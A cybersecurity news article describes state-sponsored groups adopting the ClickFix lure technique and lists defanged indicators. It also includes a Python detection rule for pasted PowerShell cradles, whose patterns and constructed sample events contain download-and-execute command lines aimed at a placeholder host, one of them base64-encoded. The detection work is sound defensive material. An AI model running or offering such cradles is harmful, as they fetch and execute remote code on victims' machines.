Cyber Security News

State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns

State-sponsored hackers from North Korea, Iran, and Russia have begun deploying the ClickFix social engineering technique, traditionally associated with cybercriminal activity, in their espionage operations.

Proofpoint researchers documented this shift over a three-month period from late 2024 into early 2025, during which these actors used ClickFix in their routine campaigns.

The Emergence of ClickFix

ClickFix, a social engineering method that uses dialog boxes to coax victims into copying, pasting, and running malicious commands themselves, has emerged as a significant tool in the arsenal of state-sponsored groups.

The lure imitates authoritative alerts from the operating system and walks the user through a series of fake error-resolution steps that end with the user running a command, typically in PowerShell, which fetches and executes the attacker's script. Because the victim launches the command by hand, the payload never has to arrive as an attachment or exploit.

First observed in cybercrime campaigns in early 2024, it is now appearing in espionage campaigns.

North Korean actor TA427, also known as Kimsuky or Emerald Sleet, was observed utilizing ClickFix in their infection chain.

TA427 ClickFix infection chains (chain 1 – solid line; chain 2 – dotted line).

Targeting think tanks working on North Korean affairs, TA427 initiated contact with spoofed meeting requests purporting to come from diplomats, then lured the targets into running a PowerShell command.

That command fetched and executed further scripts, ending with the installation of QuasarRAT, an open-source remote access trojan more commonly seen in cybercrime.
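On the endpoint, the infection chain described above leaves a recognisable shape: a script host such as powershell.exe spawned by explorer.exe (the parent of anything started from the Win+R Run dialog) with a download-and-execute one-liner, sometimes hidden behind -EncodedCommand. The following detection logic is an added example, not code from the article or from Proofpoint. It runs over constructed Sysmon-style process-creation events (Event ID 1 field names: Image, ParentImage, CommandLine); the command lines, the example.invalid host and the scoring threshold are invented for the demonstration and should be tuned against real telemetry.

```python
import base64
import re

# explorer.exe is the parent of anything started from the Win+R Run dialog or a
# double-click, which is where a ClickFix lure tells the victim to paste.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}

# Traits of a pasted download-and-execute one-liner, each worth one point.
CRADLE_PATTERNS = {
    "download": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                           r"downloadstring|downloadfile|start-bitstransfer|"
                           r"curl|wget)\b", re.I),
    "eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "hidden-window": re.compile(r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b", re.I),
    "policy-bypass": re.compile(r"(?:^|\s)-(?:nop|noprofile|ep|executionpolicy)\b", re.I),
    "mshta-remote": re.compile(r"\bmshta(?:\.exe)?\s+\S*https?://", re.I),
}
ENCODED_RE = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext behind a PowerShell -EncodedCommand argument, or None.
    PowerShell base64-encodes UTF-16LE, so a plain UTF-8 decode would hide
    the cradle keywords from the patterns above."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, reasons, decoded_command) for one process-creation event."""
    reasons = []
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return 0, reasons, None
    if basename(event.get("ParentImage", "")) in INTERACTIVE_PARENTS:
        reasons.append("interactive-parent")
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        reasons.append("encoded-command")
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    for name, pattern in CRADLE_PATTERNS.items():
        if pattern.search(text):
            reasons.append(name)
    return len(reasons), reasons, decoded


def detect_clickfix(events, threshold=3):
    """Events that look like a user-pasted cradle: an interactive parent plus at
    least two cradle traits. Script hosts started by an RMM agent, scheduler or
    logon script have a different parent and are left alone by design."""
    hits = []
    for event in events:
        score, reasons, decoded = score_event(event)
        if score >= threshold and "interactive-parent" in reasons:
            hits.append({"event": event, "score": score,
                         "reasons": reasons, "decoded": decoded})
    return hits


# Constructed sample telemetry (Sysmon Event ID 1 field names); the hosts and
# command lines are invented and are not indicators from the campaigns above.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/temp.vbs')"
    .encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/docs/en/a.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -ep bypass -enc " + ENCODED_PAYLOAD},
    {"ParentImage": r"C:\Program Files\Corp\Agent\agent.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -nop -File C:\scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c dir"},
]

if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"], hit["event"]["CommandLine"][:60])
```

The two trapped events are the plain cradle and the encoded one; the agent-launched inventory script and the harmless cmd from explorer.exe fall below the threshold. The rule deliberately requires the interactive parent rather than keywords alone, which is what keeps administrators' own PowerShell out of the queue.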

Iranian Cyber Operations

Iran’s TA450, or MuddyWater, targeted 39 organizations across the Middle East with an English-language phishing campaign.

Masquerading as a security update from Microsoft, the attackers used ClickFix to deploy remote monitoring and management (RMM) software.

The RMM software gave TA450 operators access for espionage and data exfiltration; the campaign, around November 2024, was the first time the group was observed using the Level RMM tool.

Russian-linked groups, including UNK_RemoteRogue and TA422 (also known as Sofacy or APT28), have also tested ClickFix.

Decoy lure Questionnaire.pdf.

According to the report, UNK_RemoteRogue sent targeted messages to defense-sector entities, directing recipients to a malware-laden web page.

In a separate campaign, TA422 used a page mimicking a Google spreadsheet to get targets to execute PowerShell commands that established SSH tunnels and deployed Metasploit.

The growing adoption of ClickFix underscores how fluid cyber tactics are: innovative criminal techniques are rapidly assimilated into state-backed operations, and defenders must adapt accordingly.

Indicators of Compromise (IoC)

To help protect against such threats, here are some key indicators associated with these campaigns:

Type | Description | First Seen
Email address | yasuyuki.ebata21@proton[.]me | February 2025
Email address | eunsoolim29@gmail[.]com | January 2025
IP | 115.92.4[.]123 (likely compromised) | January 2025
Domain | securedrive.networkguru[.]com | January 2025
URL | hxxps://securedrive.fin-tech[.]com/docs/en/ | January 2025
SHA256 | 06816634fb019b6ed276d36f414f3b36f99b845ddd1015c2b84a34e0b8d7f083 (Letter from Ambassador Cho Hyun-Dong.pdf) | January 2025
SHA256 | 0ff9c4bba39d6f363b9efdfa6b54127925b8c606ecef83a716a97576e288f6dd (temp.vbs) | January 2025


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
